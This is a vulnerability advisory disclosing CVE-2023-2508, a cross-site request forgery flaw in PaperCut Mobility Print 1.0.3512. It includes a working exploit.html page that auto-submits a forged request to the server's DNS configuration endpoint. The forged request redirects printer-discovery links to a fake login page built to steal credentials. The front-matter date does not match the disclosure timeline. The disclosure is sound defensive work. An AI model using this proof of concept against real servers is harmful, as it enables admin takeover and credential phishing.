---
slug: advisories/solveig/
title: CSRF in PaperCut Mobility Print leads to sophisticated phishing
authors: Carlos Bello
writer: cbello
codename: solveig
product: CSRF in PaperCut Mobility Print leads to sophisticated phishing
date: 2023-03-06 12:00 COT
cveid: CVE-2023-2508
severity: 5.3
description: CSRF in PaperCut Mobility Print leads to sophisticated phishing
keywords: Fluid Attacks, Security, Vulnerabilities, Python, Papercutng, CSRF, Mobility Print
banner: advisories-bg
advise: yes
template: advisory
---

## Summary

<summary-table
    name="CSRF in PaperCut Mobility Print leads to sophisticated phishing"
    code="[Solveig](https://es.wikipedia.org/wiki/Martin_Solveig)"
    product="PaperCut Mobility Print"
    affected-versions="Version 1.0.3512"
    fixed-versions=""
    state="Public"
    release="2023-09-20">
</summary-table>

## Vulnerability

<vulnerability-table
    kind="Cross-site request forgery"
    rule="[007. Cross-site request forgery](https://help.fluidattacks.com/portal/en/kb/articles/criteria-vulnerabilities-007)"
    remote="Yes"
    vector="CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N"
    score="5.3"
    available="Yes"
    id="[CVE-2023-2508](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2508)">
</vulnerability-table>

## Description

The `PaperCut Mobility Print` version 1.0.3512 application allows an
unauthenticated attacker to perform a CSRF attack on an instance
administrator to configure the clients host (in the "configure printer
discovery" section). This is possible because the application has no
protections against CSRF attacks, like Anti-CSRF tokens, header origin
validation, samesite cookies, etc.

## Vulnerability

This vulnerability occurs because the application has no protections
against CSRF attacks, like Anti-CSRF tokens, header origin validation,
samesite cookies, etc.

## Exploitation

In this scenario an unauthenticated attacker to perform a CSRF attack
on an instance administrator to configure the clients host (in the
"configure printer discovery" section).

Then, when the administrator wants to share the link to users so that
they can configure their credentials, they are actually sending users
to a malicious website that pretends to be the PaperCut NG login, with
the goal of exfiltrating the credentials.

### exploit.html

```html
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>
    </head>
    <body>
        <form action=http://vulnerable.com:9163/dns-config method=POST enctype=text/plain>
            <input type=hidden name={"mdnsEnabled":false,"searchDomain":"","subnets":[],"currentStep":"","dnsOptionSelected":"","dnsConfigModified":false,"ZoneIndex":0,"AccessibleIP":"","AccessibleHTTPSPort":0,"dnsFreeEnabled":true,"ExternalIPCIDRs":null,"serverAddresses":["192.168.1.8","Retr02332-MacBookPro.local"],"httpsPort":0,"dnsFreeDiscoveryHostname":"localhost:9999/login.html?redirect="," value=x":"x"} />
        </form>
        <script>document.forms[0].submit();</script>
    </body>
</html>
```

### Evidence of exploitation

<iframe src="https://www.veed.io/embed/f0b18c24-9749-467e-a126-a6202f6c11b7"
width="835" height="504" frameborder="0" title="PaperCut-Mobility-Print"
webkitallowfullscreen mozallowfullscreen allowfullscreen controls></iframe>

## Our security policy

We have reserved the ID CVE-2023-2508 to refer to this issue from now on.

* https://fluidattacks.com/advisories/policy/

## System Information

* Version: PaperCut Mobility Print 1.0.3512

* Operating System: MacOS

## Mitigation

An updated version of PaperCut Mobility Print is available at the vendor page.

## Credits

The vulnerability was discovered by [Carlos
Bello](https://www.linkedin.com/in/carlos-andres-bello) from Fluid Attacks'
Offensive Team.

## References

**Vendor page** <https://www.papercut.com/>

**PaperCut Mobility Print server release history** <https://www.papercut.com/help/manuals/mobility-print/release-history/#mobility-print-server>

**PaperCut Mobility Print android app release history** <https://www.papercut.com/help/manuals/mobility-print/release-history/#mobility-print-android-app>

## Timeline

<time-lapse
  discovered="2023-05-03"
  contacted="2023-05-03"
  replied="2023-05-03"
  confirmed="2023-05-08"
  patched="2023-08-22"
  disclosure="2023-09-20">
</time-lapse>
